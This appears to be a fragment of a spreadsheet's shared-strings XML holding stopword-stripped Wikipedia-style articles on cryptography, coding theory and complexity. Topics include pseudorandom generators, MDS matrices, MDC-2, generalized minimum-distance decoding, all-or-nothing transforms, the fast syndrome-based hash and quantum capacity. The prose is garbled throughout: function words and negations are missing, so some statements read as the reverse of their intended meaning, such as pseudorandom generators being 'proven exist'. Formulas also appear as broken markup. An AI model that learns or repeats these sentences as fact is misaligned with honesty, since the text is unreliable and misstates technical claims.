generators. construction naor naor (1990) achieves seed length {\displaystyle \ell =\log n+o(\log(\epsilon ^{-1}))} optimal constant factors. pseudorandom generators linear functions often serve building block complicated pseudorandom generators. polynomials viola (2008) proves taking {\displaystyle small-bias generators fools polynomials degree {\displaystyle seed length {\displaystyle \ell =d\cdot \log n+o(2^{d}\cdot \log(\epsilon ^{-1}))} constant-depth circuits constant depth circuits produce single output bit. limitations probability pseudorandom generators used cryptography universal algorithmic derandomization proven exist, although existence widely believed. proofs existence would imply proofs lower bounds circuit complexity certain explicit functions. such circuit lower bounds cannot proved framework natural proofs assuming existence stronger variants cryptographic pseudorandom generators. references sanjeev arora boaz barak, computational complexity: modern approach, cambridge university press (2009), isbn 9780521424264. oded goldreich, computational complexity: conceptual perspective, cambridge university press (2008), isbn 978-0-521-88473-0. oded goldreich, foundations cryptography: basic tools, cambridge university press (2001), isbn 9780521791724. naor, joseph; naor, moni (1990), "small-bias probability spaces: efficient constructions applications", proceedings 22nd annual symposium theory computing, stoc 1990: 213–223, citeseerx 10.1.1.421.2784, doi:10.1145/100216.100244, isbn 978-0897913614, s2cid 14031194 viola, emanuele (2008), "the small-bias generators fools polynomials degree (pdf), proceedings 23rd annual conference computational complexity (ccc 2008): 124–127, citeseerx 10.1.1.220.1554, doi:10.1109/ccc.2008.16, isbn 978-0-7695-3169-4 this article incorporates material pseudorandom generator planetmath, licensed creative commons attribution/share-alike license.</t>
  </si>
  <si>
    <t>MDS matrix</t>
  </si>
  <si>
    <t>matrix (maximum distance separable) matrix representing function certain diffusion properties useful applications cryptography. technically, {\displaystyle m\times matrix {\displaystyle finite field {\displaystyle matrix transformation matrix linear transformation {\displaystyle f(x)=ax} {\displaystyle k^{n}} {\displaystyle k^{m}} different {\displaystyle (m+n)} -tuples form {\displaystyle (x,f(x))} coincide {\displaystyle components. equivalently, {\displaystyle (m+n)} -tuples {\displaystyle (x,f(x))} code, i.e., linear code reaches singleton bound. {\displaystyle {\tilde {a}}={\begin{pmatrix}\mathrm _{n}\\\hline \mathrm \end{pmatrix}}} matrix obtained joining identity matrix {\displaystyle \mathrm _{n}} {\displaystyle then necessary sufficient condition matrix {\displaystyle every possible {\displaystyle n\times submatrix obtained removing {\displaystyle rows {\displaystyle {\tilde {a}}} non-singular. this also equivalent following: sub-determinants matrix {\displaystyle non-zero. then binary matrix {\displaystyle (namely field elements) never unless column components {\displaystyle reed–solomon codes property frequently used obtain matrices used cryptographic algorithms. serge vaudenay suggested using matrices cryptographic primitives produce called multipermutations, not-necessarily linear functions property. these functions called perfect diffusion: changing {\displaystyle inputs changes least {\displaystyle m-t+1} outputs. showed exploit imperfect diffusion cryptanalyze functions multipermutations. matrices used diffusion block ciphers aes, shark, square, twofish, anubis, khazad, manta, hierocrypt, kalyna camellia, stream cipher mugi cryptographic hash function whirlpool. references serge vaudenay (november 1994). need multipermutations: cryptanalysis safer (pdf/postscript). international workshop fast software encryption (fse '94). leuven: springer-verlag. 286–297. retrieved 2007-03-05.{{cite conference}}: maint: uses authors parameter (link) vincent rijmen, joan daemen, bart preneel, antoon bosselaers, erik (february 1996). cipher shark (pdf/postscript). international workshop fast software encryption (fse '96). cambridge: springer-verlag. 99–111. retrieved 2007-03-06.{{cite conference}}: maint: uses authors parameter (link) bruce schneier, john kelsey, doug whiting, david wagner, chris hall, niels ferguson (june 1998). "the twofish encryption algorithm" (pdf/postscript). retrieved 2007-03-04. {{cite journal}}: cite journal requires |journal= (help)cs1 maint: uses authors parameter (link)</t>
  </si>
  <si>
    <t>Fast Library for Number Theory</t>
  </si>
  <si>
    <t>fast library number theory (flint) library number theory applications. major areas functionality currently implemented flint polynomial arithmetic integers quadratic sieve. library designed compiled multi-precision library (gmp) released general public license. developed william hart university kaiserslautern (formerly university warwick) david harvey university south wales (formerly harvard university) address speed limitations pari libraries. design philosophy asymptotically fast algorithms implementations fast faster alternatives written pure reliance extensively tested extensively profiled support parallel computation functionality polynomial arithmetic integers quadratic sieve references notes</t>
  </si>
  <si>
    <t>First-order reduction</t>
  </si>
  <si>
    <t>computer science, first-order reduction strong type reduction computational problems computational complexity theory. first-order reduction reduction component restricted class problems calculable first-order logic. since {\displaystyle {\mbox{fo}}\subsetneq {\mbox{l}}} first-order reductions stronger reductions logspace reductions. many important complexity classes closed first-order reductions, many traditional complete problems first-order complete well (immerman 1999 49-50). example, st-connectivity fo-complete closed reductions (immerman 1999, "well-behaved" classes). references immerman, neil (1999). descriptive complexity. york: springer-verlag. isbn 0-387-98600-6.</t>
  </si>
  <si>
    <t>MDC-2</t>
  </si>
  <si>
    <t>cryptography, mdc-2 (modification detection code sometimes called meyer–schilling, standardized 10118-2) cryptographic hash function. mdc-2 hash function based block cipher proof security ideal-cipher model. length output hash depends underlying block cipher used. algorithm given message {\displaystyle hash given block cipher encryption function {\displaystyle mdc-2 algorithm proceeds follows. {\displaystyle block length, {\displaystyle a_{1},b_{1}} different constants size {\displaystyle {\displaystyle m=m_{1}||..||m_{m}} {\displaystyle m_{i}} size {\displaystyle hash {\displaystyle v_{m}||w_{m}} message given {\displaystyle i=1} {\displaystyle {\displaystyle v_{i}=m_{i}\oplus e(m_{i},a_{i})} {\displaystyle w_{i}=m_{i}\oplus e(m_{i},b_{i})} {\displaystyle v_{i}^{l}||v_{i}^{r}=v_{i}} {\displaystyle w_{i}^{l}||w_{i}^{r}=w_{i}} {\displaystyle a_{i+1}=v_{i}^{l}||w_{i}^{r}} {\displaystyle b_{i+1}=w_{i}^{l}||v_{i}^{r}} return {\displaystyle a_{m+1}||b_{m+1}} mdc-2des hashes when mdc-2 uses block cipher, 128-bit (16-byte) mdc-2 hashes typically represented 32-digit hexadecimal numbers. {\displaystyle a_{1}} chosen 8-byte string 5252525252525252 {\displaystyle b_{1}} chosen 8-byte string 2525252525252525 (written hexdigits). additionally, iteration first byte a[0] {\displaystyle recalculated (a[0] 0x9f) 0x40 first byte b[0] {\displaystyle recalculated (b[0] 0x9f) 0x20. following demonstrates 43-byte ascii input (which padded five zero-bytes length multiple block size bytes) corresponding mdc-2 hash: mdc2("the quick brown jumps lazy dog") 000ed54e093d61679aefbeae05bfe33a even small change message (with probability) result completely different hash, e.g. changing mdc2("the quick brown jumps lazy cog") 775f59f8e51aec29c57ac6ab850d58e8 hash zero-length string mdc2("") 52525252525252522525252525252525 patent issues mdc-2 covered u.s. patent 4,908,861, issued march 1990 filed august 1987. because patent concerns support mdc-2 disabled openssl linux distributions implemented many cryptographic libraries. implemented gpg's libgcrypt. patent expire august 2007, twenty years filing date. actually expired 2002 renewal fee. canadian patent renewed european patent granted mdc-2 freely used. also one-way compression function notes</t>
  </si>
  <si>
    <t>Generalized minimum-distance decoding</t>
  </si>
  <si>
    <t>coding theory, generalized minimum-distance (gmd) decoding provides efficient algorithm decoding concatenated codes, based using errors-and-erasures decoder outer code. naive decoding algorithm concatenated codes optimal decoding take account information maximum likelihood decoding (mld) gives. words, naive algorithm, inner received codewords treated regardless difference hamming distances. intuitively, outer decoder place higher confidence symbols whose inner encodings close received word. david forney 1966 devised better algorithm called generalized minimum distance (gmd) decoding makes information better. this method achieved measuring confidence received codeword, erasing symbols whose confidence desired value. decoding algorithm first examples soft-decision decoders. present three versions decoding algorithm. first randomized algorithms last deterministic algorithm. setup hamming distance given vectors {\displaystyle u,v\in \sigma ^{n}} hamming distance {\displaystyle {\displaystyle denoted {\displaystyle \delta (u,v)} defined number positions {\displaystyle {\displaystyle differ. minimum distance: {\displaystyle c\subseteq \sigma ^{n}} code. minimum distance code {\displaystyle defined {\displaystyle d=\min \delta (c_{1},c_{2})} {\displaystyle c_{1}\neq c_{2}\in code concatenation: given {\displaystyle m=(m_{1},\cdots ,m_{k})\in [q]^{k}} consider codes call outer code inner code {\displaystyle c_{\text{out}}=[q]^{k}\to [q]^{n},\qquad c_{\text{in}}:[q]^{k}\to [q]^{n},} distances {\displaystyle {\displaystyle concatenated code achieved {\displaystyle c_{\text{out}}\circ c_{\text{in}}(m)=(c_{\text{in}}(c_{\text{out}}(m)_{1}),\ldots ,c_{\text{in}}(c_{\text{out}}(m)_{n}))} {\displaystyle c_{\text{out}}(m)=((c_{\text{out}}(m)_{1},\ldots ,(m)_{n})).} finally take {\displaystyle c_{\text{out}}} code, errors erasure decoder, {\displaystyle k=o(\log turn implies inner code polynomial {\displaystyle time.maximum likelihood decoding (mld): decoding method error correcting codes, outputs codeword closest received word hamming distance. function denoted {\displaystyle d_{mld}:\sigma ^{n}\to defined follows. every {\displaystyle y\in \sigma ^{n},d_{mld}(y)=\arg \min _{c\in c}\delta (c,y)} probability density function probability distribution {\displaystyle sample space {\displaystyle mapping events {\displaystyle real numbers {\displaystyle \pr[a]\geq event {\displaystyle a,\pr[s]=1} {\displaystyle \pr[a\cup b]=\pr[a]+\pr[b]} mutually exclusive events {\displaystyle {\displaystyle expected value: expected value discrete random variable {\displaystyle {\displaystyle \mathbb [x]=\sum _{x}\pr[x=x].} randomized algorithm consider received word {\displaystyle \mathbf =(y_{1},\ldots ,y_{n})\in [q^{n}]^{n}} corrupted noisy channel. following algorithm description general case. algorithm, decode declaring erasure every position running errors erasure decoding algorithm {\displaystyle c_{\text{out}}} resulting vector. randomized_decoder given {\displaystyle \mathbf =(y_{1},\dots ,y_{n})\in [q^{n}]^{n}} every {\displaystyle 1\leq i\leq compute {\displaystyle y_{i}'=mld_{c_{\text{in}}}(y_{i})} {\displaystyle \omega _{i}=\min(\delta (c_{\text{in}}(y_{i}'),y_{i}),{\tfrac {d}{2}})} every {\displaystyle 1\leq i\leq repeat with probability {\displaystyle 2\omega _{i} \over {\displaystyle y_{i}''\leftarrow otherwise {\displaystyle y_{i}''=y_{i}'} errors erasure algorithm {\displaystyle c_{\text{out}}} {\displaystyle \mathbf ''=(y_{1}'',\ldots ,y_{n}'')} .theorem received word exists codeword {\displaystyle \mathbf =(c_{1},\cdots ,c_{n})\in c_{\text{out}}\circ {c_{\text{in}}}\subseteq [q^{n}]^{n}} {\displaystyle \delta (\mathbf ,\mathbf )&lt;{\tfrac {dd}{2}}} then deterministic algorithm outputs {\displaystyle \mathbf note naive decoding algorithm concatenated codes correct {\displaystyle {\tfrac {dd}{4}}} errors. lemma assumption theorem hold. {\displaystyle \mathbf {\displaystyle errors {\displaystyle erasures (when compared {\displaystyle \mathbf step {\displaystyle \mathbb [2e'+s']&lt;d.} remark. {\displaystyle 2e'+s'&lt;d} algorithm step output {\displaystyle \mathbf lemma says expectation, indeed case. note enough prove theorem crucial developing future variations algorithm. proof lemma every {\displaystyle 1\leq i\leq define {\displaystyle e_{i}=\delta (y_{i},c_{i}).} this implies {\displaystyle \sum _{i=1}^{n}e_{i}&lt;{\frac {dd}{2}}\qquad \qquad (1)} next every {\displaystyle 1\leq i\leq define indicator variables: {\displaystyle {\begin{aligned}x{_{i}^{?}}=1&amp;\leftrightarrow y_{i}''=?\\x{_{i}^{e}}=1&amp;\leftrightarrow c_{\text{in}}(y_{i}'')\neq c_{i}\ {\text{and}}\ y_{i}''\neq ?\end{aligned}}} claim done show every {\displaystyle 1\leq i\leq {\displaystyle \mathbb \left[2x{_{i}^{e}+x{_{i}^{?}}}\right]\leqslant {2e_{i} \over d}\qquad \qquad (2)} clearly, definition {\displaystyle e'=\sum _{i}x_{i}^{e}\quad {\text{and}}\quad s'=\sum _{i}x_{i}^{?}.} further, linearity expectation, {\displaystyle \mathbb [2e'+s']\leqslant {\frac {2}{d}}\sum _{i}e_{i}&lt;d.} prove consider cases: {\displaystyle block correctly decoded (case {\displaystyle block incorrectly decoded (case case {\displaystyle (c_{i}=c_{\text{in}}(y_{i}'))} note {\displaystyle y_{i}''=?} {\displaystyle x_{i}^{e}=0} {\displaystyle \pr[y_{i}''=?]={\tfrac {2\omega _{i}}{d}}} implies {\displaystyle \mathbb [x_{i}^{?}]=\pr[x_{i}^{?}=1]={\tfrac {2\omega _{i}}{d}},} {\displaystyle \mathbb [x_{i}^{e}]=\pr[x_{i}^{e}=1]=0} further, definition {\displaystyle \omega _{i}=\min \left(\delta (c_{\text{in}}(y_{i}'),y_{i}),{\tfrac {d}{2}}\right)\leqslant \delta (c_{\text{in}}(y_{i}'),y_{i})=\delta (c_{i},y_{i})=e_{i}} case {\displaystyle (c_{i}\neq c_{\text{in}}(y_{i}'))} case, {\displaystyle \mathbb [x_{i}^{?}]={\tfrac {2\omega _{i}}{d}}} {\displaystyle \mathbb [x_{i}^{e}]=\pr[x_{i}^{e}=1]=1-{\tfrac {2\omega _{i}}{d}}.} since {\displaystyle c_{i}\neq c_{\text{in}}(y_{i}'),e_{i}+\omega _{i}\geqslant this follows another case analysis {\displaystyle (\omega _{i}=\delta (c_{\text{in}}(y_{i}'),y_{i})&lt;{\tfrac {d}{2}})} not. finally, implies {\displaystyle \mathbb [2x_{i}^{e}+x_{i}^{?}]=2-{2\omega _{i} \over d}\leq {2e_{i} \over d}.} following sections, finally show deterministic version algorithm unique decoding {\displaystyle c_{\text{out}}\circ c_{\text{in}}} half design distance. modified randomized algorithm note that, previous version algorithm step "3", really need "fresh" randomness {\displaystyle come another randomized version algorithm uses randomness every {\displaystyle this idea follows algorithm below. modified_randomized_decoder given {\displaystyle \mathbf =(y_{1},\ldots ,y_{n})\in [q^{n}]^{n}} pick {\displaystyle \theta [0,1]} random. then every every {\displaystyle 1\leq i\leq {\displaystyle y_{i}'=mld_{c_{\text{in}}}(y_{i})} compute {\displaystyle \omega _{i}=\min(\delta (c_{\text{in}}(y_{i}'),y_{i}),{d \over 2})} {\displaystyle \theta &lt;{\tfrac {2\omega _{i}}{d}}} {\displaystyle y_{i}''\leftarrow otherwise {\displaystyle y_{i}''=y_{i}'} errors erasure algorithm {\displaystyle c_{\text{out}}} {\displaystyle \mathbf ''=(y_{1}'',\ldots ,y_{n}'')} .for proof lemma randomness show {\displaystyle \pr[y_{i}''=?]={2\omega _{i} \over d}.} version algorithm, note {\displaystyle \pr[y_{i}''=?]=\pr \left[\theta \left[0,{\tfrac {2\omega _{i}}{d}}\right]\right]={\tfrac {2\omega _{i}}{d}}.} second equality follows choice {\displaystyle \theta proof lemma also used show {\displaystyle \mathbb [2e'+s']&lt;d} version2 gmd. next section, deterministic version algorithm choosing {\displaystyle \theta polynomially sized opposed current infinite {\displaystyle [0,1]} deterministic algorithm {\displaystyle q=\{0,1\}\cup \{{2\omega _{1} \over d},\ldots ,{2\omega _{n} \over d}\}} since {\displaystyle i,\omega _{i}=\min(\delta (\mathbf {y_{i}'} ,\mathbf {y_{i}} ),{d \over 2})} {\displaystyle q=\{0,1\}\cup \{q_{1},\ldots ,q_{m}\}} {\displaystyle q_{1}&lt;\cdots &lt;q_{m}} {\displaystyle m\leq \left\lfloor {\frac {d}{2}}\right\rfloor note every {\displaystyle \theta [q_{i},q_{i+1}]} step second version randomized algorithm outputs {\displaystyle \mathbf ''.} thus, need consider possible value {\displaystyle \theta this gives deterministic algorithm below. deterministic_decoder given {\displaystyle \mathbf =(y_{1},\ldots ,y_{n})\in [q^{n}]^{n}} every {\displaystyle \theta repeat following. compute {\displaystyle y_{i}'=mld_{c_{\text{in}}}(y_{i})} {\displaystyle 1\leq i\leq {\displaystyle \omega _{i}=\min(\delta (c_{\text{in}}(y_{i}'),y_{i}),{d \over 2})} every {\displaystyle 1\leq i\leq {\displaystyle \theta &lt;{2\omega _{i} \over {\displaystyle y_{i}''\leftarrow otherwise {\displaystyle y_{i}''=y_{i}'} errors-and-erasures algorithm {\displaystyle c_{\text{out}}} {\displaystyle \mathbf ''=(y_{1}'',\ldots ,y_{n}'')} {\displaystyle c_{\theta codeword {\displaystyle c_{\text{out}}\circ c_{\text{in}}} corresponding output algorithm, any. among {\displaystyle c_{\theta output output closest {\displaystyle \mathbf every loop polynomial time, algorithm also computed polynomial time. specifically, call errors erasures decoder {\displaystyle &lt;dd/2} errors takes {\displaystyle o(d)} time. finally, runtime algorithm {\displaystyle o(nqn^{o(1)}+nt_{\text{out}})} {\displaystyle t_{\text{out}}} running time outer errors erasures decoder. also concatenated codes reed solomon error correction welch berlekamp algorithm references university buffalo lecture notes coding theory atri rudra lecture notes essential coding theory madhu sudan university washington venkatesan guruswami david forney. generalized minimum distance decoding. ieee transactions information theory, 12:125–131, 1966</t>
  </si>
  <si>
    <t>Fast fracture</t>
  </si>
  <si>
    <t>structural engineering material science, fast fracture phenomenon flaw (such crack) material expands quickly, leads catastrophic failure material. proceeds high speed requires relatively small amount accumulated strain energy, making dangerous failure mode. flaw stress acting material fast fracture occurs less material's yield stress. representative example happens poking blown balloon needle, fast fracture balloon's material. energy balloon comes compressed inside energy stored rubber membrane itself. introduction flaw, case prick, would lead explosion membrane fails fast fracture. however, flaw introduced balloon less energy case partially inflated balloon fast fracture occur, unless balloon punctured progressively reaches critical pressure fast fracture occurs.the occurrence fast fracture depend material. instance, transpires cases brittle materials less capacity deformation even flaw involves small defects caused manufacturing process. also yield (engineering) references</t>
  </si>
  <si>
    <t>All-or-nothing transform</t>
  </si>
  <si>
    <t>cryptography, all-or-nothing transform (aont), also known all-or-nothing protocol, encryption mode allows data understood known. aonts encryption, frequently make symmetric ciphers applied encryption. exact terms, aont unkeyed, invertible, randomized transformation, property hard invert unless output known." algorithms original aont, package transform, described ronald rivest 1997 paper "all-or-nothing encryption package transform". transform rivest proposed involved preprocessing plaintext xoring plaintext block block's index encrypted randomly chosen key, appending extra block computed xoring random hashes preprocessed blocks. result preprocessing called pseudomessage, serves input encryption algorithm. undoing package transform requires hashing every block pseudomessage except last, xoring hashes last block recover random key, using random convert preprocessed block back original plaintext block. way, impossible recover original plaintext without first access every single block pseudomessage. although rivest's paper gave detailed description package transform applies mode, implemented using cipher mode. therefore, multiple variants: package transform, package transform, etc. 1999 victor boyko proposed another aont, provably secure random oracle model.apparently time, stinson proposed different implementation aont, without cryptographic assumptions. this implementation linear transform, perhaps highlighting security weakness original definition. applications aonts used increase strength encryption without increasing size. this useful example, secure secrets complying government cryptography export regulations. aonts help prevent several attacks. ways aonts improve strength encryption preventing attacks reveal part information revealing anything, partial information enough recover original message. another application, suggested original papers reduce cost security: example, file processed aont, small portion encrypted (e.g., smart-card). aont assure result whole file protected. important stronger version transform (such boyko above). aont combined forward error correction yield computationally secure secret sharing scheme.other uses aont found optimal asymmetric encryption padding (oaep). references external links staple, open-source prototype all-or-nothing transform implementation.</t>
  </si>
  <si>
    <t>Fast syndrome-based hash</t>
  </si>
  <si>
    <t>cryptography, fast syndrome-based hash functions (fsb) family cryptographic hash functions introduced 2003 daniel augot, matthieu finiasz, nicolas sendrier. unlike cryptographic hash functions today, certain extent proven secure. more exactly, proven breaking least difficult solving certain np-complete problem known regular syndrome decoding provably secure. though known whether np-complete problems solvable polynomial time, often assumed not. several versions proposed, latest submitted sha-3 cryptography competition rejected first round. though versions claim provable security, preliminary versions eventually broken. design latest version however taken attack account remains secure currently known attacks. usual, provable security comes cost. slower traditional hash functions uses quite memory, makes impractical memory constrained environments. furthermore, compression function used needs large output size guarantee security. this last problem solved recent versions simply compressing output another compression function called whirlpool. however, though authors argue adding last compression reduce security, makes formal security proof impossible. description hash function start compression function {\displaystyle \phi parameters {\displaystyle {n,r,w}} {\displaystyle n&gt;w} {\displaystyle w\log(n/w)&gt;r} this function work messages length {\displaystyle s=w\log(n/w)} {\displaystyle size output. furthermore, want {\displaystyle n,r,w,s} {\displaystyle \log(n/w)} natural numbers, {\displaystyle \log denotes binary logarithm. reason {\displaystyle w\cdot \log(n/w)&gt;r} want {\displaystyle \phi compression function, input must larger output. later merkle–damgård construction extend domain inputs arbitrary lengths. basis function consists (randomly chosen) binary {\displaystyle r\times matrix {\displaystyle acts message {\displaystyle bits matrix multiplication. here encode {\displaystyle w\log(n/w)} -bit message vector {\displaystyle (\mathbf _{2})^{n}} {\displaystyle -dimensional vector space field elements, output message {\displaystyle bits. security purposes well faster hash speed want “regular words weight {\displaystyle input matrix. definitions message called word weight {\displaystyle length {\displaystyle consists {\displaystyle bits exactly {\displaystyle bits ones. word weight {\displaystyle length {\displaystyle called regular every interval {\displaystyle [(i-1)(n/w),i(n/w))} contains exactly nonzero entry {\displaystyle 0&lt;i&lt;w+1} more intuitively, means chop message equal parts, part contains exactly nonzero entry. compression function there exactly {\displaystyle (n/w)^{w}} different regular words weight {\displaystyle length {\displaystyle need exactly {\displaystyle \log((n/w)^{w})=w\log(n/w)=s} bits data encode regular words. bijection strings length {\displaystyle regular words weight {\displaystyle length {\displaystyle compression function defined follows input: message size {\displaystyle convert regular word length {\displaystyle weight {\displaystyle multiply matrix {\displaystyle output: hash size {\displaystyle this version usually called syndrome-based compression. slow practice done different faster resulting fast syndrome-based compression. split {\displaystyle sub-matrices {\displaystyle h_{i}} size {\displaystyle r\times n/w} bijection strings length {\displaystyle w\log(n/w)} sequences {\displaystyle numbers {\displaystyle n/w} this equivalent bijection regular words length {\displaystyle weight {\displaystyle since word sequence numbers {\displaystyle n/w} compression function looks follows: input: message size {\displaystyle convert {\displaystyle sequence {\displaystyle numbers {\displaystyle s_{1},\dots ,s_{w}} {\displaystyle n/w} corresponding columns matrices {\displaystyle h_{i}} obtain binary string length {\displaystyle output: hash size {\displaystyle merkle–damgård construction generalize compression function accept inputs arbitrary lengths. example compression situation initialization: hash message 010011 {\displaystyle s=010011} using {\displaystyle 4\times matrix {\displaystyle h=\left({\begin{array}{llllcllllcllll}1&amp;0&amp;1&amp;1&amp;~&amp;0&amp;1&amp;0&amp;0&amp;~&amp;1&amp;0&amp;1&amp;1\\0&amp;1&amp;0&amp;0&amp;~&amp;0&amp;1&amp;1&amp;1&amp;~&amp;0&amp;1&amp;0&amp;0\\0&amp;1&amp;1&amp;1&amp;~&amp;0&amp;1&amp;0&amp;0&amp;~&amp;1&amp;0&amp;1&amp;0\\1&amp;1&amp;0&amp;0&amp;~&amp;1&amp;0&amp;1&amp;1&amp;~&amp;0&amp;0&amp;0&amp;1\end{array}}\right)} separated {\displaystyle w=3} sub-blocks {\displaystyle h_{1}} {\displaystyle h_{2}} {\displaystyle h_{3}} algorithm: split input {\displaystyle {\displaystyle w=3} parts length {\displaystyle \log _{2}(12/3)=2} {\displaystyle s_{1}=01} {\displaystyle s_{2}=00} {\displaystyle s_{3}=11} convert {\displaystyle s_{i}} integer {\displaystyle s_{1}=1} {\displaystyle s_{2}=0} {\displaystyle s_{3}=3} from first sub-matrix {\displaystyle h_{1}} pick column second sub-matrix {\displaystyle h_{2}} column third sub-matrix column chosen columns obtain result 0111 0001 1001 1111 {\displaystyle r=0111\oplus 0001\oplus 1001=1111} security proof merkle–damgård construction proven base security security used compression function. need show compression function {\displaystyle \phi secure. cryptographic hash function needs secure three different aspects: pre-image resistance: given hash hard find message hash(m)=h second pre-image resistance: given message hard find message hash(m1) hash(m2) collision resistance: hard find different messages hash(m1)=hash(m2)note adversary find second pre-image, certainly find collision. this means prove system collision resistant, certainly second-pre-image resistant. usually cryptography hard means something like “almost certainly beyond reach adversary must prevented breaking system”. however need exact meaning word hard. take hard mean “the runtime algorithm finds collision pre-image depend exponentially size hash value”. this means relatively small additions hash size, quickly reach high security. pre-image resistance regular syndrome decoding (rsd) said before, security depends problem called regular syndrome decoding (rsd). syndrome decoding originally problem coding theory np-completeness makes nice application cryptography. regular syndrome decoding special case syndrome decoding defined follows: definition rsd: given {\displaystyle matrices {\displaystyle h_{i}} dimension {\displaystyle r\times (n/w)} string {\displaystyle length {\displaystyle exists {\displaystyle columns, {\displaystyle h_{i}} summing {\displaystyle find columns. this problem proven np-complete reduction 3-dimensional matching. again, though known whether exist polynomial time algorithms solving np-complete problems, none known finding would huge discovery. easy finding pre-image given hash {\displaystyle exactly equivalent problem, problem finding pre-images must also np-complete. still need prove collision resistance. need another np-complete variation rsd: 2-regular null syndrome decoding. collision resistance 2-regular null syndrome decoding (2-rnsd) definition 2-rnsd: given {\displaystyle matrices {\displaystyle h_{i}} dimension {\displaystyle r\times (n/w)} string {\displaystyle length {\displaystyle exists {\displaystyle columns, zero {\displaystyle h_{i}} summing zero. {\displaystyle (0&lt;w'&lt;2w)} find columns. 2-rnsd also proven np-complete reduction 3-dimensional matching. just like essence equivalent finding regular word {\displaystyle {\displaystyle hw=s} 2-rnsd equivalent finding 2-regular word {\displaystyle {\displaystyle hw'=0} 2-regular word length {\displaystyle weight {\displaystyle string length {\displaystyle every interval {\displaystyle [(i-1)w,iw)} exactly zero entries equal note 2-regular word regular words. suppose found collision, hash(m1) hash(m2) {\displaystyle m_{1}\neq m_{2}} then find regular words {\displaystyle w_{1}} {\displaystyle w_{2}} {\displaystyle hw_{1}=hw_{2}} {\displaystyle h(w_{1}+w_{2})=hw_{1}+hw_{2}=2hw_{1}=0} {\displaystyle (w_{1}+w_{2})} different regular words must 2-regular word hash zero, solved instance 2-rnsd. conclude finding collisions least difficult solving 2-rnsd must np-complete. latest versions compression function whirlpool compress hash output. though cannot proven, authors argue last compression reduce security. note even able find collisions whirlpool, would still need find collisions pre-images original compression function find collision fsb. examples solving rsd, opposite situation hashing. using values previous example, given {\displaystyle separated {\displaystyle w=3} sub-blocks string 1111 {\displaystyle r=1111} asked find sub-block exactly column would {\displaystyle expected answer thus {\displaystyle s_{1}=1} {\displaystyle s_{2}=0} {\displaystyle s_{3}=3} this known hard compute large matrices. 2-rnsd want find sub-block column, zero would 0000 (and {\displaystyle example, might column (counting {\displaystyle h_{1}} column {\displaystyle h_{2}} column {\displaystyle h_{3}} more solutions possible, example might columns {\displaystyle h_{3}} linear cryptanalysis provable security means finding collisions np-complete. proof reduction problem asymptotically hard worst-case complexity. this offers limited security assurance still algorithm easily solves problem subset problem space. example, exists linearization method used produce collisions matter seconds desktop early variants claimed 2^128 security. shown hash function offers minimal pre-image collision resistance message space chosen specific way. practical security results following table shows complexity best known attacks fsb. genesis speed-up version syndrome-based hash function (sb). case compression function similar encoding function niederreiter's version mceliece cryptosystem. instead using parity check matrix permuted goppa code, uses random matrix {\displaystyle from security point view strengthen system. other properties both block size hash function output size completely scalable. speed adjusted adjusting number bitwise operations used input bit. security adjusted adjusting output size. instances exist must take care choosing matrix {\displaystyle matrix used compression function grow large certain situations. this might limitation trying memory constrained devices. this problem solved related hash function called improved fsb, still provably secure, relies slightly stronger assumptions. variants 2007, ifsb published. 2010, s-fsb published, faster original.in 2011, bernstein tanja lange published rfsb, faster original fsb-256. rfsb shown fast spartan fpga, reaching throughputs around gbit/s. references external links website sha-3 competition</t>
  </si>
  <si>
    <t>Quantum capacity</t>
  </si>
  <si>
    <t>theory quantum communication, quantum capacity highest rate quantum information communicated many independent uses noisy quantum channel sender receiver. also equal highest rate entanglement generated channel, forward classical communication cannot improve quantum capacity theorem important theory quantum error correction, broadly theory quantum computation. theorem giving lower bound quantum capacity channel colloquially known theorem, authors lloyd, shor, devetak proved increasing standards rigor. hashing bound pauli channels theorem states coherent information quantum channel achievable rate reliable quantum communication. pauli channel, coherent information simple form proof achievable particularly simple well. prove theorem special case exploiting random stabilizer codes correcting likely errors channel produces. theorem (hashing bound). there exists stabilizer quantum error-correcting code achieves hashing limit {\displaystyle r=1-h\left(\mathbf \right)} pauli channel following form: {\displaystyle \rho \mapsto p_{i}\rho +p_{x}x\rho x+p_{y}y\rho y+p_{z}z\rho {\displaystyle \mathbf =\left(p_{i},p_{x},p_{y},p_{z}\right)} {\displaystyle h\left(\mathbf \right)} entropy probability vector. proof. consider correcting typical errors. that consider defining typical errors follows: {\displaystyle t_{\delta }^{\mathbf ^{n}}\equiv \left\{a^{n}:\left\vert -{\frac {1}{n}}\log _{2}\left(\pr \left\{e_{a^{n}}\right\}\right)-h\left(\mathbf \right)\right\vert \leq \delta \right\},} {\displaystyle a^{n}} sequence consisting letters {\displaystyle \left\{i,x,y,z\right\}} {\displaystyle \left\{e_{a^{n}}\right\}} probability pauli channel issues tensor-product error {\displaystyle e_{a^{n}}\equiv e_{a_{1}}\otimes \cdots \otimes e_{a_{n}}} this typical consists likely errors sense {\displaystyle \sum _{a^{n}\in t_{\delta }^{\mathbf ^{n}}}\pr \left\{e_{a^{n}}\right\}\geq 1-\epsilon {\displaystyle \epsilon sufficiently large {\displaystyle error-correcting conditions stabilizer code {\displaystyle {\mathcal {s}}} case {\displaystyle \{e_{a^{n}}:a^{n}\in t_{\delta }^{\mathbf ^{n}}\}} correctable errors {\displaystyle e_{a^{n}}^{\dagger }e_{b^{n}}\notin n\left({\mathcal {s}}\right)\backslash {\mathcal {s}},} error pairs {\displaystyle e_{a^{n}}} {\displaystyle e_{b^{n}}} {\displaystyle a^{n},b^{n}\in t_{\delta }^{\mathbf ^{n}}} {\displaystyle n({\mathcal {s}})} normalizer {\displaystyle {\mathcal {s}}} also, consider expectation error probability random choice stabilizer code. proceed follows: uncorrectable uncorrectable uncorrectable uncorrectable {\displaystyle {\begin{aligned}\mathbb _{\mathcal {s}}\left\{p_{e}\right\}&amp;=\mathbb _{\mathcal {s}}\left\{\sum _{a^{n}}\pr \left\{e_{a^{n}}\right\}{\mathcal {i}}\left(e_{a^{n}}{\text{ uncorrectable }}{\mathcal {s}}\right)\right\}\\&amp;\leq \mathbb _{\mathcal {s}}\left\{\sum _{a^{n}\in t_{\delta }^{\mathbf ^{n}}}\pr \left\{e_{a^{n}}\right\}{\mathcal {i}}\left(e_{a^{n}}{\text{ uncorrectable }}{\mathcal {s}}\right)\right\}+\epsilon \\&amp;=\sum _{a^{n}\in t_{\delta }^{\mathbf ^{n}}}\pr \left\{e_{a^{n}}\right\}\mathbb _{\mathcal {s}}\left\{{\mathcal {i}}\left(e_{a^{n}}{\text{ uncorrectable }}{\mathcal {s}}\right)\right\}+\epsilon \\&amp;=\sum _{a^{n}\in t_{\delta }^{\mathbf ^{n}}}\pr 